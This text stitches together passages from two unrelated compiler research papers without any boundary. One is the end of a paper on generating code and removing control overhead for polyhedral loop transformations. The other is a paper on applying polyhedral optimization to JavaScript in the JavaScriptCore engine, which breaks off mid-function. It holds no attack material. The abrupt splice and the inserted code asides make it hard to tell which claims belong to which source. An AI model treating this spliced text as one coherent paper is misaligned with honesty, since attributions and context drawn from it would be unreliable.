Find an overhead we wish to remove. 2. Determine a constraint that, if tested, would allow us to eliminate the overhead. 3. Create a new split node that tests that constraint, with the code containing the overhead duplicated under both branches of the split. Our optimization criterion is the maximum number of loops $k_{max}$ that we will allow to surround a source of overhead. Roughly speaking, the cost of an overhead nested inside of $d$ loops will be $O(n^d)$, where $n$ is the number of iterations of a loop. We could use more exact methods [17] to evaluate the cost of an overhead. However, the cost of such analysis is probably not worthwhile and would be of questionable benefit (e.g., it is not clear whether it is better to remove a source of overhead executed $mn(n-1)/2$ times or a source executed $m^2n$ times). If a code fragment executes $O(n^d)$ necessary operations, then executing $O(n^d)$ avoidable overhead is probably unacceptable. Reducing the avoidable overhead to $O(n^{d-1})$ will probably be acceptable in this situation and any further reduction may be unnoticeable. We are able to dynamically control the amount of overhead that we eliminate based on the amount of code explosion seen so far. Given an AST with loops nested $d$ deep, we first remove overhead nested within $d$ loops. We next remove overhead nested within $d-1$ loops, and so on, until all overhead nested inside $k_{max}$ loops is eliminated. To remove all overhead nested $k_{max}$ deep, we first traverse down the AST to each loop nested $k_{max}$ deep. Note that in counting nesting depth, we only count loop nodes that require a loop to be generated (i.e., that contain more than one iteration). Upon reaching a loop nested $k_{max}$ deep, we need to lift out all overhead from the body of that loop. We search the body of the loop for a constraint that would eliminate some source of overhead.
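One common case is a `min` in an upper bound: testing the constraint `a <= b` lets each branch of the split use a simple bound. A small check of this (illustrative Python, modeling loops over a hypothetical index range):

```python
# A loop with upper bound min(a, b) versus the two specialized loops
# produced by splitting on a <= b: the iterations executed are identical,
# but neither specialized loop evaluates min() inside the nest.

def with_min(a, b):
    return [i for i in range(1, min(a, b) + 1)]   # min in the bound

def split_version(a, b):
    if a <= b:                                    # the split condition
        return [i for i in range(1, a + 1)]       # bound is just a
    else:
        return [i for i in range(1, b + 1)]       # bound is just b

for a, b in [(3, 8), (8, 3), (5, 5)]:
    assert with_min(a, b) == split_version(a, b)
```

In the AST this corresponds to a new split node whose two children are copies of the original loop node, each with a tighter bounds attribute.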
We then generate a split node on that condition, place copies of the original loop node under both branches of the split node, and attempt to remove overhead from both branches. We only extract one constraint at a time and then reevaluate using the algorithm described in Section 5. Testing one constraint might eliminate the need to test another constraint in one of the two branches (e.g., both $i \leq 10$ and $i \leq 20$ might remove overhead, but $i \leq 20$ would not need to be tested in the true branch of a split on $i \leq 10$). Finding constraints that eliminate overheads is fairly straightforward. All guards of atomic statements and loops are sources of overhead and can easily be located by examining the guard attributes of loop and leaf nodes. For loop nodes, we also can check to see if the bounds contain multiple lower bounds or multiple upper bounds. If so, it is straightforward to generate the constraint that eliminates the overhead (e.g., testing $a \leq b$ will eliminate the overhead of computing $\min(a, b)$). Figure 7 shows the optimized AST and corresponding code for the example introduced in Figure 3, with all overhead inside four or more loops removed. Table 1 shows the overhead (as a percentage of original code time) and code size for different levels of overhead optimization. The blocked version contains more overhead than the original, unblocked code, since it adds extra loops for the blocking. The line marked “Naive” is for comparison only; we do not generate that code. The naive code is a set of loops scanning the convex hull, with all remaining conditions checked as innermost guards. The optimized code for $k_{max} = 4$ is identical to the initial case, since there are no overheads nested inside 5 loops in the initial code. The results here do not include cache effects, so we can measure the overhead directly. At higher levels of optimization, the code size increases dramatically, with diminishing performance gains.
In this example, removing control overhead located inside more than 3 loops ($k_{max} = 3$) is probably sufficient.

Figure 7: Optimized blocked LU decomposition (optimized AST and corresponding code)

8 Related work

The problem of generating code for a convex region was first addressed by Ancourt and Irigoin [1]. They use Fourier pairwise elimination at each level to provide bounds on each of the index variables. They then form the union of all of these projections to produce a single set of constraints which explicitly contains all of the information necessary to generate code. They propose that fast inexact techniques be used to remove redundancies from this set before it is used to generate code. They consider only the single mapping convex case. Li and Pingali [15] consider the non-convex case resulting from mappings that are not necessarily onto. They use a linear algebra framework and compute loop bounds and steps using Hermite normal form. They do not consider the multiple mapping case. Ayguadé and Torres [2] consider a limited case of the multiple mapping case where each statement can have a potentially different mapping but all mappings must have the same linear part (i.e., they only differ in their constant parts). Chamski [4, 5] generates Nested Loop Structures, which are similar to our AST. He discusses generating code only for the single mapping convex case. He reduces control overhead by generating sequences of loops to remove all min and max expressions in loop bounds. The cost of code duplication may be large when all such overheads are removed. We are able to eliminate control overhead from sources other than min’s and max’s and we selectively decide which overheads to eliminate by considering both the amount of control overhead and the amount of code duplication that would occur. Chamski claims [4] that Fourier variable elimination is prohibitively expensive for code generation.
We have found it to be a very efficient method, and suspect he used unrealistic examples and/or a poor implementation of Fourier variable elimination. It is well known that Fourier variable elimination performs poorly on moderate to large systems of constraints where the constraints are dense, i.e., each constraint involves many variables. However, the constraints we have seen in both dependence analysis and code generation are quite sparse, and Fourier elimination is quite efficient for sparse constraints [19]. Collard, Feautrier and Risset [7] show how PIP, a parametrized version of the Dual Simplex Method, can be used to solve the simple case. Collard and Feautrier [6] address the multiple-mapping case; however, only one-dimensional iteration spaces are considered and many guards are generated. They provide some interesting solutions to the situation where statements have incompatible stride constraints (e.g., \( t_1 \) is even and \( t_1 \) is odd). Stride constraints such as these arise frequently in Feautrier's parallelization framework [9, 10], while we [13, 11] try to avoid them in our framework, since generating good code for them is difficult.

9 Conclusion

We have presented an algorithm to generate transformed code from the original code and a set of one-to-one statement mappings representing the transformation. Unlike most previous systems, our system can generate efficient loop structures even when a potentially different mapping is used with each statement and the resulting union of iteration spaces is non-convex. Our algorithms permit optimization of the control overhead that results from non-convexity, and allow the user to trade off lower overhead against code duplication. This approach to generating code and the optimizations we describe are particularly important for loop interchange or loop blocking of imperfectly nested loops.

10 Implementation and availability

An implementation of this algorithm is available in the Omega Calculator.
The Omega Calculator and copies of our other papers are available from http://www.cs.umd.edu/projects/omega and ftp://ftp.cs.umd.edu/pub/omega. References
Abstract

The JavaScript language was originally designed for writing small scripts that add dynamism to web pages. It is now widely used, on both the server and client sides, for programs requiring intensive computation as well. Some examples are video game engines and image processing applications. This work focuses on improving performance for this kind of program. Because JavaScript is a dynamic language, a JavaScript program cannot be compiled efficiently to native code. To achieve good performance on such dynamic programs, the common implementation strategy is to have several layers handle the JavaScript code, starting with interpretation and going up to aggressive just-in-time compilation. Nevertheless, all existing implementations execute JavaScript functions using a single thread. In this work we propose to use the polyhedral model in the just-in-time compilation layer to parallelize compute-intensive programs that contain loop nests. We highlight the scientific challenges, resulting from the dynamism of the language, of integrating automatic polyhedral optimization. We then show how to solve these challenges in Apple's JavaScriptCore implementation.

Keywords: JavaScript engine, automatic parallelization, polyhedral optimization, just-in-time compilation.

1 Introduction

JavaScript is a high-level, prototype-based, object-oriented, dynamic language. Strictly speaking, JavaScript is not the specification of the language itself, but the initial language and implementation developed by Netscape. The standard name for the language is ECMAScript, whose first version was released in June 1997 and whose most recent version was released in June 2017. For simplicity, and following the widespread if technically incorrect usage, we will refer to the language as JavaScript in the following. Because JavaScript is a dynamic language, a JavaScript source program cannot be compiled efficiently to native code.
Instead, JavaScript programs are handled by a JavaScript implementation, referred to as a JavaScript engine in the following. This engine is in charge of executing the JavaScript source program given as input. Historically, JavaScript was used on the client web-browser side to enable dynamic web pages. A large number of applications now also use JavaScript for running compute-intensive tasks such as image processing routines or video game engines. JavaScript is also now widely used as a server-side language. Because of its widespread usage, all the major internet companies and open-source communities have their own JavaScript engine. Google has its V8 engine [6], Apple has JavaScriptCore [2], Mozilla has SpiderMonkey [16] and Microsoft has Chakra [15]. For many years, these companies and open-source communities have optimized their engines in the context of the so-called "browser war". To efficiently execute JavaScript programs, all these engines use a layered approach, often starting with interpretation of JavaScript source code and ending in aggressive just-in-time compilation to native code. Surprisingly, even though the engines themselves are parallel applications, none of them is able to execute JavaScript code in parallel. The sequential nature of the language itself is probably one explanation. In other words, because the language does not allow parallelism to be expressed, and because of the dynamism it provides, it is very challenging to identify and exploit parallelism in JavaScript applications. Even though none of the widespread JavaScript engines mentioned above can execute JavaScript code in parallel, recent research has started to study this question [9, 13, 14, 17]. Relying on speculation, on language extensions or on automatic loop parallelization, these proposals have shown that parallelism can be exploited in JavaScript benchmarks and real applications.
Independently of JavaScript, the polyhedral model [5] has proven to be very useful for optimizing and parallelizing compute-intensive application kernels written in non-dynamic languages such as C. More recently, polyhedral optimization has also been applied by just-in-time compilers [11, 12, 19]. In the latter case, the optimization and parallelization are performed dynamically, during the execution of the application. Motivated by these first results regarding JavaScript parallelization and by the growing usage of polyhedral tools in just-in-time compilers, we study in this work the possibility of using the polyhedral model for automatic optimization and parallelization of JavaScript. As we show in the paper, the main challenges are related to the management of the dynamism allowed by the language. The growing usage of JavaScript for compute-intensive applications is a motivating indicator for the application of polyhedral optimization. In this work, we make the following contributions:

- Identification of the scientific challenges of integrating polyhedral optimization in JavaScript;
- Proposal of solutions to these challenges in the context of a state-of-the-art JavaScript engine;
- Demonstration of the benefits of polyhedral optimization on a matrix multiplication JavaScript kernel;
- Identification of perspectives allowing more JavaScript programs to be handled with the polyhedral model.

The rest of the paper is organized as follows. Section 2 describes the architecture of a layered JavaScript engine along with some basics of the polyhedral model. Section 3 presents the scientific challenges that must be handled to enable polyhedral optimization in a layered JavaScript engine. Section 4 proposes solutions to these challenges. Section 6 presents preliminary results on a matrix multiplication kernel. Finally, Sections 7 and 8 present related work and conclude this preliminary work.

# 2 Background And Objective

JavaScript is a very dynamic language.
This dynamism has a strong impact on the way JavaScript programs are executed. The language allows pieces of code to be loaded dynamically during execution. This feature by itself is hardly compatible with static compilers. Static compilation is also not an optimal solution because of the lack of information in the source code, e.g., the absence of type information. For these reasons, JavaScript programs are executed by a JavaScript engine. This engine handles dynamism and can offer good performance by observing the execution of the program and then optimizing it based on its observations. Using the polyhedral model in the context of JavaScript implies taking this dynamism into account. This section gives an overview of the kinds of dynamism allowed by JavaScript, before describing how state-of-the-art JavaScript engines handle it. Finally, a brief introduction to the polyhedral model is given.

## 2.1 JavaScript Dynamism

To illustrate several forms of dynamism in JavaScript, let us consider the simple function shown in Figure 1.

```javascript
function f(img, width, height) {
  for (var i = 0; i < width; i++) {
    for (var j = 0; j < height; j++) {
      var v = img[i*width + j];
      v = v + 41;
      v = v * 7;
      img[i*width + j] = v;
    }
  }
}
```

**Figure 1.** Simple JavaScript function iterating over an image.

To execute this function, the engine must first determine where the property `i*width + j` of the `img` parameter is located. Then the engine must determine the meaning of the `+` and `*` operators for the `v` variable, according to its type. Another important concern for engines, revealed indirectly by this example, is JavaScript numbers. From the programmer's point of view, the specification states that numbers are all double-precision floating-point numbers. This has a strong impact on the performance of the engine, which must implement these semantics. Nevertheless, JavaScript engines use cheap 32-bit integer instructions when programs manipulate small integer values.
But because JavaScript numbers must behave as double-precision floating-point numbers, using 32-bit integer instructions is semantically correct only if the numbers fit in 32 bits. As a consequence, in our example, considering that `img` contains only integers, the engine has to check that `v` fits in 32 bits when using the processor's 32-bit integer instructions to perform the `+` and `*` operations. The language is also very permissive regarding arrays. This is not shown in our example, but in JavaScript it is possible to write outside the bounds of an array. For example, a function scaling up an image could have statements writing outside the image. In this case, the semantics of the language is to extend the array up to the index that has been written. Slots in the array between the previous last element and the one just written are then considered holes.

## 2.2 Layered JavaScript Engine

To efficiently handle all forms of dynamism present in the language, all JavaScript engines rely on a layered architecture [6, 15, 16]. Figure 2 depicts the architecture of JavaScriptCore [2], the engine that we use in this work. JavaScriptCore is a state-of-the-art JavaScript engine developed by Apple and used in the WebKit project, WebKit itself being used, among others, by the Safari web browser. Depending on the engine, some of the layers depicted in this figure may not be present, but the global architecture is the same for all the JavaScript engines in use. These engines work on a per-function basis. Each time a function is called, it is executed by a given layer depending on the context. The main idea is to execute the time-consuming functions in the most efficient layers, in which the engine can afford to spend time on optimization.

![Diagram of JavaScriptCore's layered architecture](image)

**Figure 2.** The layered architecture of JavaScriptCore.
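As a short aside, the out-of-bounds write semantics described above can be observed directly (an illustration of ours, independent of any particular engine):

```javascript
// Writing past the end of an array extends it; the skipped slots become
// holes: reading them yields undefined, and `in` reports them as absent.
const a = [1, 2];
a[5] = 7;                 // extends the array to length 6
console.log(a.length);    // 6
console.log(a[3]);        // undefined (a hole)
console.log(3 in a);      // false: index 3 was never written
console.log(5 in a);      // true
```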
We now describe this layered architecture by showing how our example function of Figure 1 is handled, focusing on the + and * operators. The first time the engine must execute a given function, it compiles it to its own bytecode representation. The function is then handled by the first layer, an interpreter, whose source code can be summarized in a simplified way by the code depicted in Figure 3. As already mentioned, the interpreter must take care of the types of the operands and dispatch to the appropriate implementation. Then, on a later invocation, or within the current invocation of the function, the engine may decide to switch to the next layer, labeled Baseline JIT in Figure 2. This layer compiles the function bytecode to native code. This is done in a very naive way, by replacing each bytecode instruction with the corresponding assembly sequence of the interpreter. Figure 4 shows the generated binary code for the two consecutive instructions that compute the new value of \( v \) in our example function. This first compilation step removes the overhead of dispatching instructions: in the generated code, compared to the interpreter, there is no longer a switch on the type for the current instruction. Then, again on a later invocation or within the current invocation of the function, the engine may decide to switch to the next layer, called the DFG (DataFlow Graph) JIT. Compared to the interpreter and the Baseline JIT layers, the execution now enters the speculative part of the JavaScript engine. In this layer, JavaScriptCore relies on assumptions made by looking at profiling information gathered by the previous layers. This profiling information contains, for example, the effective types that have been encountered so far. Considering that our function has only been called with arrays of integers fitting in 32 bits, JavaScriptCore creates a new representation of the program taking this information into account, as shown in Figure 5.
If speculation fails, JavaScriptCore must go back to the last non-speculative layer in order to execute the function correctly according to the JavaScript semantics. Starting from this new representation, which no longer contains any instructions devoted to handling dynamism, typical compiler optimizations may be performed before generating new native code far more efficient than the one generated by the naive Baseline JIT layer.

```javascript
function f(img, width, height) {
  if (img is array of 32 bits integers) {
    for (var i = 0; i < width; i++) {
      for (var j = 0; j < height; j++) {
        var v = img[i*width + j];
        v = v->as_int() + 41;
        v = v->as_int() * 7;
        img[i*width + j] = v;
      }
    }
  } else {
    return to Baseline JIT;
  }
}
```

Figure 5. Internal representation of the DFG JIT speculative layer for the example function (pseudocode).

Finally, the FTL JIT layer, which is also speculative, consists in applying more aggressive, and thus more time-consuming, transformations. To that end, JavaScriptCore compiles the dataflow-graph intermediate representation to LLVM-IR and then to native code. Using LLVM allows most of its transformations and its backend to be leveraged. The general idea of this design is to remove as much dynamism as possible by profiling the code behavior. The final layers can then apply aggressive optimization, since they do not need to handle dynamism. In case of bad predictions, execution rolls back to the first layers. Existing JavaScript engines are not able to execute JavaScript code in parallel. Said differently, the interpreter code and the different versions of native code generated dynamically are all sequential. Nevertheless, the just-in-time compilation process itself is often performed in parallel with the execution in the previous layer. Other tasks of the JavaScript engine, e.g., garbage collection, are also performed in parallel in existing engines.
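The speculate-and-bail pattern of Figure 5 can be mimicked in plain JavaScript. This is a sketch of ours; real engines implement the guard and the fallback in generated native code, not with exceptions:

```javascript
// Sketch of the speculative pattern: a fast path assumes results fit in
// 32 bits and bails out when the assumption breaks; a generic path then
// redoes the work. `x | 0` truncates to int32, so comparing against the
// original value detects numbers that no longer fit in 32 bits.
function fitsInt32(x) {
  return (x | 0) === x;
}

function scalePixelFast(v) {
  const r = (v + 41) * 7;
  if (!fitsInt32(r)) throw new Error('bailout'); // back to the previous layer
  return r;
}

function scalePixel(v) {
  try {
    return scalePixelFast(v);   // speculative int32-only path
  } catch (e) {
    return (v + 41) * 7;        // generic double path
  }
}
```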
2.3 The Polyhedral Model

The polyhedral model [5] is a mathematical model devoted to the analysis and transformation of loop nests. To be optimized with the polyhedral model, a loop nest must comply with what is called a Static Control Part (SCoP). A SCoP is a loop nest in which loop bounds, memory accesses and branch conditions are all affine functions of parameters that are constant in the nest and of the enclosing loop iterators. Based on this model, classical loop transformations such as skewing, interchange and others can be expressed in a common, simple formalism. Historically, polyhedral tools were implemented as source-to-source compilers. More recently, polyhedral optimization has been implemented at the level of compiler intermediate representations. It has been successfully deployed in production compilers such as GCC and LLVM by the GRAPHITE [20] and Polly [7] frameworks, respectively. The main challenges for performing optimization on an intermediate representation are the identification of SCoPs and the choice of granularity for what is considered a schedule unit by the polyhedral optimizer, i.e., a statement in the polyhedral terminology. In this work, we do not address these challenges but rely on existing proposals and tools. The challenges we address are related to the objective of having the last optimization layers of the JavaScript engine generate code that can be handled by polyhedral tools.

2.4 Objective

The final objective of this work is to integrate polyhedral optimizations in JavaScript engines. This can only be done in the last speculative layers of the engine, when the dynamism has been entirely removed, so that the code is in the closest possible shape to what polyhedral tools can handle. To reach this goal, we present in this paper the challenges of merging the world of advanced static optimization with the world of just-in-time compilation for a dynamic language such as JavaScript.
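The SCoP definition from Section 2.3 can be illustrated with two small nests. These are our own examples, with illustrative names:

```javascript
// SCoP candidate: bounds n and m are constant within the nest, and the
// access index i*m + j is an affine function of the iterators.
function affineNest(img, n, m) {
  for (let i = 0; i < n; i++)
    for (let j = 0; j < m; j++)
      img[i * m + j] += 1;
}

// Not a SCoP: the access index comes from the data itself (idx[i]), so it
// is not an affine function of the iterators and constant parameters.
function nonAffineNest(img, idx, n) {
  for (let i = 0; i < n; i++)
    img[idx[i]] += 1;
}
```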
3 Challenges For Polyhedral Optimization Of JavaScript Programs

This section brings to light the challenges of integrating polyhedral optimization inside a JavaScript engine so as to generate native code that is more efficient than the code generated by state-of-the-art engines. The additional performance comes from the parallelization and data-locality optimization provided by the polyhedral model. In Section 4, we propose solutions to these challenges in the context of the JavaScriptCore engine developed by Apple.

3.1 Issue 1: SCoPs Detection

As stated in Section 2.3, the first challenge for polyhedral tools working on intermediate representations is to identify SCoPs. In the context of the intermediate representation generated by a JavaScript engine, this detection is made even more difficult by the shape of the code, which is quite different from the code generated by front-ends for static languages such as C or C++.

3.1.1 Single Entry Single Exit Regions

Section 2.3 introduced the three constraints a loop nest must satisfy to be a SCoP. The constraint on conditionals implies that the control flow of the loop must be statically known. In practice, polyhedral tools operating on intermediate representations add the constraint that the loop nest must form a Single Entry Single Exit (SESE) region. This means that all the basic blocks of the loop nest must be in a region of code with only one entry point and one exit point. In the context of code generated by a JavaScript engine, this requirement is not met, because of the handling of speculation. For each speculation check, the engine inserts a jump back to the previous layer, as shown previously in Figure 5. This jump is implemented in the intermediate representation by blocks jumping to a particular address of the runtime, which is responsible for resuming execution in the previous layer. Figure 6.
Engine speculation leads to non-SESE regions in the control flow graph of the intermediate representation. Figure 6 shows the control flow graph generated by the JavaScriptCore engine for the innermost loop of Figure 1. This graph clearly reveals a non-SESE structure. The four blocks on the left are jumps to the previous layer of the engine, which prevent this loop nest from forming a SESE region. As stated in Section 2.2, these checks are required to ensure that the speculations made by the engine from past profiling results are still valid. In this particular example, the checks ensure that the code does not perform an access outside the bounds of the array, that it accesses an element of the array that has already been allocated, i.e., not a hole, and that the results of the integer operations fit in 32 bits. This 32-bit size was chosen by the engine when generating native code, because all the profiled values fit in 32 bits.

3.1.2 Detection Of Affine Accesses To Arrays

As described in the previous sections, JavaScript arrays are complex objects. They can be extended and are not typed: one array can simultaneously store various types of data in its cells. Nevertheless, for an array of primitive types without holes, JavaScript engines use contiguous memory. The successful detection of affine accesses to these contiguous arrays of primitive types strongly depends on the structure of the code generated by the JavaScript engine. This structure must comply with a code shape that polyhedral tools can successfully parse. Section 4.1.2 will show why the code generated by JavaScriptCore does not enable detection of affine accesses.

3.1.3 Two Dimensional Arrays And Arrays Of Objects

Two-dimensional arrays do not exist in JavaScript. To declare a two-dimensional array, the programmer has to create a first one-dimensional array, and then a second one in each cell of the first array.
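The two representations can be compared concretely (an illustration of ours):

```javascript
// JavaScript's "2-D array" is an array of row arrays: t[i][j] costs two
// loads. The common alternative is one contiguous array indexed by i*m + j.
const n = 2, m = 3;

// Nested representation: an array holding one array per row.
const nested = [];
for (let i = 0; i < n; i++) {
  nested[i] = [];
  for (let j = 0; j < m; j++) nested[i][j] = i * m + j;
}

// Linearized representation: one contiguous array.
const flat = new Array(n * m);
for (let i = 0; i < n; i++)
  for (let j = 0; j < m; j++) flat[i * m + j] = i * m + j;

console.log(nested[1][2] === flat[1 * m + 2]); // true: same logical element
```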
Because of this lack of two-dimensional arrays in the language, JavaScript engines cannot store two-dimensional arrays in contiguous memory. Also, because JavaScript arrays can contain elements of different types, arrays of objects are actually implemented as arrays of pointers. As a consequence, the following expressions both imply two memory accesses:

- \( t_{\text{ints}}[i][j]=17; \)
- \( t_{\text{objs}}[i].foo=17; \)

In both cases, the first memory access is a load from an array. In the first case, the second access is also a load from an array, while in the second case it is a load of a property by its name foo. These two loads in the generated code prevent polyhedral tools from representing JavaScript loop nests iterating over such arrays. Indeed, by analyzing the code, it is impossible to know whether the successive loads of the \( i \) integer property, or of the foo named property, are affine functions of the loop iterators and constant parameters. The target locations of these memory accesses depend on the locations of the objects referred to by the arrays \( t_{\text{ints}} \) and \( t_{\text{objs}} \).

3.1.4 Alias Analysis

As with many compiler transformations, polyhedral optimization requires precise information about pointer aliasing. For a given transformation to be safe, the optimizer must ensure that arrays accessed under different names are actually different arrays. In our example function, there is no such aliasing issue. Such problems typically occur, as is the case for compilers of C programs, in a matrix multiplication function defined as shown in Figure 7.
```javascript
function matmul(left, right, res, left_nblines, left_nbcols, right_nbcols) {
  for (var i = 0; i < left_nblines; i++) {
    for (var j = 0; j < left_nbcols; j++) {
      var idx_left = i * left_nbcols + j;
      for (var k = 0; k < right_nbcols; k++) {
        var idx_res = i * right_nbcols + k;
        var idx_right = j * right_nbcols + k;
        res[idx_res] = res[idx_res] + left[idx_left] * right[idx_right];
      }
    }
  }
}
```

Figure 7. Matrix multiplication function that leads to alias analysis issues.

The compiler cannot know whether or not the res matrix aliases the left or the right one.

### 3.2 Issue 2: Parallel Speculation Failure

After an automatic optimization and parallelization of the JavaScript code by a polyhedral optimizer, several threads run a single loop nest in parallel. Because the engine applies polyhedral optimization in its last layers, the optimization is performed on speculative code. As a consequence, the generated parallel code includes jumps back to the previous layer in case of speculation failure. At runtime, if such a jump is triggered in one of the threads executing the loop nest, the current state of the system may be wrong. In a sequential execution, a speculation check is always performed before executing the code relying on it: nothing can go wrong, and the dynamism that reappears in the code is handled by the previous layer. In a parallel execution, several threads may already have performed some wrong computations when a particular thread encounters a speculation failure. All threads must then be stopped, since the execution is potentially incorrect; the jump must be handled properly and the loop restarted from the beginning in sequential mode, where the speculation failure will be handled correctly.

### 3.3 Issue 3: Gain Versus Overhead

Assuming we are able to perform polyhedral optimization of JavaScript programs inside a JavaScript engine by solving issues 1 and 2 described above, the last challenge is to ensure that it is worth doing so.
As for any runtime optimization, the time spent performing the optimization must be counterbalanced by the reduction in execution time provided by the optimized version of the code. In the context of polyhedral optimization, this gain-versus-overhead dilemma is directly related to the performance of the tools implementing the optimization. Even though these tools have exponential complexity in the number of statements of the target loop nest, it has been shown [11, 19] that they can still be used successfully at runtime. So the question to answer is whether the time required by polyhedral optimization is acceptable in the context of a JavaScript engine. This in turn raises the question of how the polyhedral tools used inside a JavaScript engine should be configured, since the configuration may strongly impact optimization time.

### 4 Solution Proposals

We now propose solutions to the challenges described in the previous section. Our proposal is to integrate polyhedral optimization in the last layer of JavaScriptCore, the FTL JIT. At this stage, all JavaScript dynamism has been removed. Also, as described in Section 4.3, integrating polyhedral optimization in the last layer helps in answering issue 3 about gain versus overhead. Moreover, because this step relies on LLVM\(^1\), our engine can leverage LLVM's mature polyhedral framework, Polly [7]. Polly first builds a polyhedral representation of the LLVM-IR; some polyhedral transformations are then performed on this representation; finally, a new version of the LLVM-IR is generated back from the optimized polyhedral representation.

### 4.1 Solution To Issue 1: SCoPs Detection

As stated in Section 3.1, the LLVM code of a loop nest generated by JavaScriptCore must be in a SESE region and must form a SCoP to be optimized with polyhedral tools such as Polly.

#### 4.1.1 SESE Regions

The solution to this problem is related to the solution for parallel speculation failure described in Section 4.2.
The main idea is to remove all terminal blocks that jump back to the previous layer, which cause the non-SESE regions. We can do this because, if such a block is executed during the parallel execution, we need to re-execute the whole loop anyway. As a consequence, the generated parallel code is semantically correct only if no such terminal block is executed. More precisely, our solution proposal is as follows:

1. Remove all terminal blocks that jump back to the previous layer;
2. Insert metadata for each instruction that can trigger a jump back to the previous layer, along with information about the condition of the jump. These instructions are the branching instructions at the bottom of each basic block shown in Figure 6;
3. Apply Polly transformations on this simplified SESE version of the code;
4. Using the metadata, insert the blocks jumping back to the previous layer again after the Polly transformations. Section 4.2 presents the detailed content of these blocks.

This solution allows Polly optimizations to be applied while still properly detecting the engine's speculation failures.

\(^1\)Starting from version 2.12, JavaScriptCore no longer uses LLVM but a custom low-level intermediate representation along with a custom backend called B3. The solutions proposed in this section nevertheless all remain applicable to this custom representation, except the one for the issue of detecting affine accesses to arrays.

### 4.1.2 Detection Of Affine Accesses To Arrays

In JavaScriptCore, for an access such as \(t[\text{index}]=17;\) where \(t\) is an array of numbers that are all 32-bit integers, JavaScriptCore originally generated the code in Figure 8. First, the offset into the array is computed: the index is multiplied by the size of one element of the array. This size is always 64 bits, even for an array of 32-bit integers, because of the way the engine internally represents objects and primitive types, through a technique called NaN boxing.
The second step adds this offset to the integer value of the pointer to the array's base. Since LLVM-IR is typed, the conversion from integer to pointer is done by the `inttoptr` instruction. Finally, the store is performed. All these steps are complex from a compiler point of view and hard to track for a tool like Polly.

```
%offset = shl i64 %index, 3
%cell_as_int = add i64 %base_as_int, %offset
%cell_ptr = inttoptr i64 %cell_as_int to i64*
store i64 %boxed_17, i64* %cell_ptr
```

**Figure 8.** Original LLVM-IR generated by JavaScriptCore for a write in an array of integers.

To expose array accesses in a way Polly can handle, our engine replaces these pointer-arithmetic instructions with the `getelementptr` instruction, which takes a variable number of parameters. The first one is the type of the array, which lets LLVM know the size of each element and, optionally, the number of elements. The second one is the accessed array, i.e., a pointer whose type must conform to the type described by the first parameter. The following parameters, whose number depends on the number of dimensions of the array, indicate which element is targeted.

```
%base_ptr = inttoptr i64 %base_as_int to [1000 x i64]*
%cell_ptr = getelementptr [1000 x i64], [1000 x i64]* %base_ptr, i32 0, i32 %index
store i64 %value, i64* %cell_ptr
```

**Figure 9.** Enhanced LLVM-IR for a write in an array of integers, allowing Polly to compute affine functions.

#### 4.1.3 Two Dimensional Arrays And Arrays Of Objects

We currently do not support optimization of loop nests including accesses to two dimensional arrays and arrays of objects; we focus on single dimension arrays of primitive types. Regarding two dimensional arrays of primitive types, this is not a strong concern, because JavaScript programmers are accustomed to avoiding them and polyhedral tools are capable of recovering dimensions [8, 11]. 
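Such programmer-side linearization can be sketched as follows. This is our own hedged illustration in plain JavaScript (the function and variable names are hypothetical, not taken from Figure 7): an n×m by m×p multiplication over flattened arrays, where element (i, j) of a matrix with row length w lives at index i*w + j.

```javascript
// Multiply an n x m matrix `a` by an m x p matrix `b`, both stored as
// flat single-dimension arrays, as JavaScript programmers commonly do.
// Element (i, j) of a matrix with row length w lives at index i * w + j.
function matmulFlat(a, b, n, m, p) {
  const c = new Float64Array(n * p); // flat n x p result, zero-initialized
  for (let i = 0; i < n; i++) {
    for (let j = 0; j < p; j++) {
      let sum = 0;
      for (let k = 0; k < m; k++) {
        // Affine subscripts in the loop indices: i*m + k and k*p + j.
        sum += a[i * m + k] * b[k * p + j];
      }
      c[i * p + j] = sum;
    }
  }
  return c;
}
```

All three subscripts are affine functions of the loop indices, which is precisely the structure that lets a tool like Polly recover the two dimensional nature of the accesses.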
JavaScript programmers already linearize arrays because JavaScript engines are far more efficient with single dimension arrays, which lead to a single memory load, compared to multi dimensional ones, as described in Section 3.1.3. Our example function in Figure 1 and the matmul function in Figure 7 show examples of two dimensional arrays that have been linearized by the programmer.

A possible solution to handle two dimensional arrays and arrays of objects would be to modify the memory allocator to force them to be contiguous. This would require either a new construct in the language, or new analyses during profiling ensuring that the engine can reallocate the array in a contiguous way. It would also imply modifying the garbage collector to maintain this property even when arrays are copied to another location of the heap. Another possible solution consists in studying how static analyses developed for other languages [21] without native multi dimensional arrays could be applied to JavaScript.

---

\(^3\)See the LLVM documentation to understand why there is an additional 0 parameter before the index one: https://llvm.org/docs/GetElementPtr.html#what-is-the-first-index-of-the-gep-instruction.

#### 4.1.4 Alias Analysis

In the context of JavaScriptCore, the alias problem is already mitigated by custom analyses. The main idea, already implemented in the engine, is a type-based analysis relying on the JavaScript object type hierarchy. In the LLVM-IR code generated by the engine, the object oriented nature of JavaScript has been removed; this is a requirement, since LLVM-IR has no such high level concepts. Nevertheless, because LLVM is used to compile not only low level languages such as C but also object oriented languages, mainly C++, the LLVM-IR provides mechanisms for specifying high level typing information. This is done through a particular type of metadata. 
This metadata specifies both a type hierarchy, in the form of a tree, and the type accessed by each store and each load instruction. Based on this information, LLVM provides alias analyses that can ensure that two memory operations will not access the same address if they access different branches of the type tree. The alias analysis problem is also mitigated by runtime solutions proposed recently [1] and implemented in Polly. The idea is to compute at compile time the conditions required to ensure that pointer-based accesses will not alias. Two versions of the code, guarded by a check implementing these conditions, are then generated.

### 4.2 Solution To Issue 2: Parallel Speculation Failure

To bypass this problem we are currently investigating two solutions. The first one, proposed recently in [17], leverages so-called idempotent regions; the second one uses rollbacks and checkpoints. An idempotent code region [3] is a region that can be interrupted in the middle of its execution and then re-executed from the beginning while still providing the same result. In other words, the region does not modify its inputs. A matrix multiplication producing a resulting array is an example of an idempotent region. Exploiting this property, a JavaScript polyhedral optimizer would only handle idempotent loops, so as to be able to re-execute them with the correct sequential non-speculative layer. This solution is simple and has only a small cost, consisting of detecting idempotent regions. On the other hand, not all loops can be parallelized with this solution. The rollback solution implies making a checkpoint of the memory state before starting the parallel execution of a loop. When a speculation failure is triggered, the memory state is first restored from the checkpoint. Then, as in the previous solution, execution starts again with the correct sequential non-speculative layer. 
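To make the idempotence criterion concrete, here is a hedged toy sketch of our own (not from the paper's implementation): the first region writes only to an output array derived from unmodified inputs, so interrupting it and re-executing it from the beginning yields the same result; the second accumulates into its own input and is therefore not idempotent.

```javascript
// Idempotent region: writes only to `out`, never modifies its inputs.
// It can be aborted mid-way and safely re-executed from the beginning.
function scaleInto(input, out, factor) {
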